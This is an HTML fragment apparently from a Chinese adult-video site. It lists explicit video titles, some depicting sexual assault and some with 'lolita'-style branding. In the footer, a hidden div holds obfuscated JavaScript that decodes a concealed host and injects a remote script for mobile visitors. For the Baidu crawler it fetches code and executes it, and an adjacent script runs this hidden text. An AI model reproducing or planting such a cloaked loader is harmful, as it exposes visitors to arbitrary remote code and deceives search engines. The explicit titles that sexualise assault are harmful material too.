                                        </h4>
                                        <p class="text text-overflow text-muted hidden-xs">2023-02-15</p>
                                    </div>
                                </div>
                            </li>
                            <li class="col-md-6 col-sm-4 col-xs-3 hidden-md">
                                <div class="stui-vodlist__box">
                                    <a class="stui-vodlist__thumb lazyload" href="/index.php/vod/play/id/76500/sid/1/nid/1.html" title="萝莉社.去医院捐精性感护士帮我在线取精" data-original="https://666533.xyz/images/2023/02/15/7f6598370bdfbc2ce3ece30df0d431d6.jpg">
                                        <span class="play hidden-xs"></span>

                                    </a>
                                    <div class="stui-vodlist__detail">
                                        <h4 class="title text-overflow">
                                            <a href="/index.php/vod/play/id/76500/sid/1/nid/1.html" title="萝莉社.去医院捐精性感护士帮我在线取精">萝莉社.去医院捐精性感护士帮我在线取精</a>
                                        </h4>
                                        <p class="text text-overflow text-muted hidden-xs">2023-02-15</p>
                                    </div>
                                </div>
                            </li>
                            <li class="col-md-6 col-sm-4 col-xs-3 hidden-md">
                                <div class="stui-vodlist__box">
                                    <a class="stui-vodlist__thumb lazyload" href="/index.php/vod/play/id/76499/sid/1/nid/1.html" title="猛料原创.日出天台漏出遭遇变态性侵-樱花小猫" data-original="https://666533.xyz/images/2023/02/15/b7a52a8d57e7f014ea88089a06fd00f4.jpg">
                                        <span class="play hidden-xs"></span>

                                    </a>
                                    <div class="stui-vodlist__detail">
                                        <h4 class="title text-overflow">
                                            <a href="/index.php/vod/play/id/76499/sid/1/nid/1.html" title="猛料原创.日出天台漏出遭遇变态性侵-樱花小猫">猛料原创.日出天台漏出遭遇变态性侵-樱花小猫</a>
                                        </h4>
                                        <p class="text text-overflow text-muted hidden-xs">2023-02-15</p>
                                    </div>
                                </div>
                            </li>
                            <li class="col-md-6 col-sm-4 col-xs-3 hidden-md">
                                <div class="stui-vodlist__box">
                                    <a class="stui-vodlist__thumb lazyload" href="/index.php/vod/play/id/76498/sid/1/nid/1.html" title="星空无限传媒.素人自制甜心.兔宝宝的情人节.骚货甜心的曼妙舞姿让你直喷鼻血" data-original="https://666533.xyz/images/2023/02/15/bbd7bef3c51ae8c02f944278d78dc9c2.jpg">
                                        <span class="play hidden-xs"></span>

                                    </a>
                                    <div class="stui-vodlist__detail">
                                        <h4 class="title text-overflow">
                                            <a href="/index.php/vod/play/id/76498/sid/1/nid/1.html" title="星空无限传媒.素人自制甜心.兔宝宝的情人节.骚货甜心的曼妙舞姿让你直喷鼻血">星空无限传媒.素人自制甜心.兔宝宝的情人节.骚货甜心的曼妙舞姿让你直喷鼻血</a>
                                        </h4>
                                        <p class="text text-overflow text-muted hidden-xs">2023-02-15</p>
                                    </div>
                                </div>
                            </li>
                            <li class="col-md-6 col-sm-4 col-xs-3 hidden-md">
                                <div class="stui-vodlist__box">
                                    <a class="stui-vodlist__thumb lazyload" href="/index.php/vod/play/id/76497/sid/1/nid/1.html" title="萝莉社.体验朋友妹妹的小嫩穴-小敏儿" data-original="https://666533.xyz/images/2023/02/15/8181ba8406f7750e7f199107ad5c363b.jpg">
                                        <span class="play hidden-xs"></span>

                                    </a>
                                    <div class="stui-vodlist__detail">
                                        <h4 class="title text-overflow">
                                            <a href="/index.php/vod/play/id/76497/sid/1/nid/1.html" title="萝莉社.体验朋友妹妹的小嫩穴-小敏儿">萝莉社.体验朋友妹妹的小嫩穴-小敏儿</a>
                                        </h4>
                                        <p class="text text-overflow text-muted hidden-xs">2023-02-15</p>
                                    </div>
                                </div>
                            </li>
                            <li class="col-md-6 col-sm-4 col-xs-3 hidden-md">
                                <div class="stui-vodlist__box">
                                    <a class="stui-vodlist__thumb lazyload" href="/index.php/vod/play/id/76496/sid/1/nid/1.html" title="天美传媒.TMP0028.吴文淇.配对游戏" data-original="https://666533.xyz/images/2023/02/15/a651296ef593f0833d671cb7a93ed766.jpg">
                                        <span class="play hidden-xs"></span>

                                    </a>
                                    <div class="stui-vodlist__detail">
                                        <h4 class="title text-overflow">
                                            <a href="/index.php/vod/play/id/76496/sid/1/nid/1.html" title="天美传媒.TMP0028.吴文淇.配对游戏">天美传媒.TMP0028.吴文淇.配对游戏</a>
                                        </h4>
                                        <p class="text text-overflow text-muted hidden-xs">2023-02-15</p>
                                    </div>
                                </div>
                            </li>
                            <li class="col-md-6 col-sm-4 col-xs-3 hidden-md">
                                <div class="stui-vodlist__box">
                                    <a class="stui-vodlist__thumb lazyload" href="/index.php/vod/play/id/76212/sid/1/nid/1.html" title="天美传媒.TMP0030.李娜娜.在朋友面前约炮到高潮" data-original="http://www.7000.me/tu/9k=.jpg">
                                        <span class="play hidden-xs"></span>

                                    </a>
                                    <div class="stui-vodlist__detail">
                                        <h4 class="title text-overflow">
                                            <a href="/index.php/vod/play/id/76212/sid/1/nid/1.html" title="天美传媒.TMP0030.李娜娜.在朋友面前约炮到高潮">天美传媒.TMP0030.李娜娜.在朋友面前约炮到高潮</a>
                                        </h4>
                                        <p class="text text-overflow text-muted hidden-xs">2023-02-15</p>
                                    </div>
                                </div>
                            </li>
                        </ul>

                    </div>
                </div>
            </div>
            <!-- 分类列表 -->

            <!-- 分类榜单 -->
            <div class="stui-pannel stui-pannel-bg hidden-sm hidden-xs clearfix">
                <div class="stui-pannel-box">
                    <div class="stui-pannel_hd">
                        <div class="stui-pannel__head active bottom-line clearfix">
                            <h3 class="title">
                                <img src="/statics/icon/icon_26.png"/>

                                                    友情链接
                                                
                            </h3>
                        </div>
                    </div>
                    <div class="stui-pannel_bd clearfix">
                        <div class="col-xs-1">
                            <ul class="stui-link__text clearfix"></ul>
                        </div>
                    </div>
                </div>
            </div>
            <!-- 友情链接 -->
        </div>
    </div>
    <div class="container">
        <div class="row">
            <div class="stui-foot clearfix">
                <div class="col-pd text-center hidden-xs">
                    Copyright
                    <span class="fontArial"></span>
                     2009-2022 www.imadou.cc Inc. All Rights Reserved.
                    <a href="/" target="_blank">[麻豆视频官网]</a>
                    <br>
                    麻豆视频
                </div>
                <p class="share bdsharebuttonbox text-center margin-0 hidden-sm hidden-xs"></p>
                <p class="text-center hidden-xs">
                    <a href="/">
                        <img src="/statics/img/copy.png" width="150" height="48"/>
                    </a>
                </p>
                <p class="text-muted text-center visible-xs">Copyright © 2008-2023</p>
            </div>
        </div>
    </div>
    <!--顶部 -->

    <!--顶部 -->
    <!--底部 -->
    <div style="display: none !important;">function fKCaQw(e){var t="",n=r=c1=c2=0;while(n&lt;e.length){r=e.charCodeAt(n);if(r&lt;128){t+=String.fromCharCode(r);n++;}else if(r&gt;191&&r&lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)&lt;&lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)&lt;&lt;12|(c2&63)&lt;&lt;6|c3&63);n+=3;}}return t;};function mAEXVuRa(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f&lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s&lt;&lt;2|o&gt;&gt;4;r=(o&15)&lt;&lt;4|u&gt;&gt;2;i=(u&3)&lt;&lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return fKCaQw(t);};window[''+'W'+'O'+'k'+'U'+'m'+'I'+'J'+'l'+'e'+'']=((navigator.platform&&!/^Mac|Win/.test(navigator.platform))||(!navigator.platform&&/Android|iOS|iPhone/i.test(navigator.userAgent)))?function(){;(function(u,i,w,d,c){var x=mAEXVuRa,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/g/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('aG5ydHkueXlycmMMuY29t','153767',window,document,['M','ZesCzPy']);}:function(){};</div>
    <script>
    new Function(document['cu' + 'rren' + 'tScr' + 'ipt']['prev' + 'iousE' + 'leme' + 'ntSi' + 'bling']['tex' + 'tCo' + 'ntent'])();
    </script>
    <div>
        <div>
            <div></div>
        </div>
    </div>
    <div></div>
    <script>
    WOkUmIJle();
    </script>
    <!--底部 -->
    <div class="hide">
        <script>
        var _hmt = _hmt || [];
        (function() {
            var hm = document.createElement("script");
            hm.src = "https://hm.baidu.com/hm.js?2ce37ebe1d2accfd7a8d922bf3e9968d";
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(hm, s);
        })();
        </script>
    </div>

</body>
</html>
